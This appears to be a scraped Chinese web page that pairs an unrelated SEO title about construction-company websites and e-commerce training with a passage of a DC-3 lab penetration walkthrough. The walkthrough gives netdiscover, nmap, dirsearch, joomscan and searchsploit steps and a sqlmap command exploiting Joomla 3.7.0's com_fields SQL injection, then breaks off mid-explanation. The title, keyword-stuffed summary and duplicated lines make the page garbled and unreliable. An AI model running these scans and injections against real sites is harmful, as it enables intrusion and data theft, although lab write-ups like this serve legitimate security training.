如何创建一个针对建筑公司网站和电商培训学校的定制电商培训课程?
摘要:如何制作建筑公司网站,电商培训学校,慈溪网站优化,海口网站建设费用文章目录 信息收集漏洞查找漏洞利用SQL注入John工具密码爆破反弹shell 提权 信息收集 主机扫描 arp-scan -l可以用netdiscover 它是一个主动被
如何制作建筑公司网站,电商培训学校,慈溪网站优化,海口网站建设费用文章目录 信息收集漏洞查找漏洞利用SQL注入John工具密码爆破反弹shell 提权 信息收集
主机扫描
arp-scan -l可以用netdiscover 它是一个主动/被动的ARP 侦查工具。使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求。
netdiscover -r 192.1… 文章目录 信息收集漏洞查找漏洞利用SQL注入John工具密码爆破反弹shell 提权 信息收集
主机扫描
arp-scan -l可以用netdiscover 它是一个主动/被动的ARP 侦查工具。使用Netdiscover工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求。
netdiscover -r 192.168.160.0/24说明 netdiscover: 这是一个网络探测工具的命令用于执行本地网络中的主机发现。-r 192.168.160.0/24: 这是一个命令的选项参数指定了要进行主机发现的 IP 地址范围。在这个例子中IP 地址范围是 192.168.160.0/24表示从 192.168.160.1 到 192.168.160.254 的所有 IP 地址。 当执行这个命令时netdiscover 将发送 ARP 请求广播到指定的 IP 地址范围内的每个主机并通过监听并收集其回应来确定哪些主机是活动的。通过这种方式可以快速发现目标网络中的活动主机以便进行进一步的分析或测试。 端口扫描
nmap -A 192.168.160.35 说明 -A #全面扫描 nmap扫描工具使用 发现80端口可用用的是Joomla的cms
浏览器访问DC-3的 80端口用Wappalyzer插件也可以看出是Joomla的
发现80端口可用用的是Joomla的cms
浏览器访问DC-3的 80端口用Wappalyzer插件也可以看出是Joomla的 目录爆破
sudo python3 dirsearch.py -u 192.168.160.35 -i 200说明 -u URL # URL目标 -i #状态码 也可以用御剑后台扫描工具 也可以用nikto扫描 Nikto 进入后台管理页面 漏洞查找
joomscan
joomscan是一款开源的且针对joomla的扫描器kali可以用命令apt install joomscan安装该工具。
joomscan -u 192.168.160.35searchsploit
searchsploit是一款kali自带的搜索漏洞信息的模块可参考searchsploit漏洞查找工具使用指南 searchsploit是一个基于Exploit-DB的命令行搜索工具可以帮助我们查找渗透模块。 Exploit-DB是一个漏洞库Kali Linux中保存了一个该漏洞库的拷贝可以查找需要的渗透模块它将搜索所有的漏洞和shellcode而且该漏洞库是保存在本地的在没有网络的情况下也可以使用。 # 搜索 joomla 3.7.0版本的漏洞
searchsploit joomla 3.7.0发现有SQL注入漏洞和跨站脚本漏洞 使用find命令找出42033.txt的位置
find / -name 42033.txt查看文件内容
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt给出了注入方法
漏洞利用
SQL注入
列出所有数据库
sqlmap -u http://192.168.160.35/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] 说明 -u http://192.168.160.35/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml: 这是一个选项参数指定要进行注入测试的目标 URL。在这个例子中目标 URL 是 http://192.168.160.35/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml。--risk3: 这是一个选项参数指定进行注入测试的风险级别0-3默认为1。这里风险级别被设置为 3表示使用最高的风险级别进行测试。
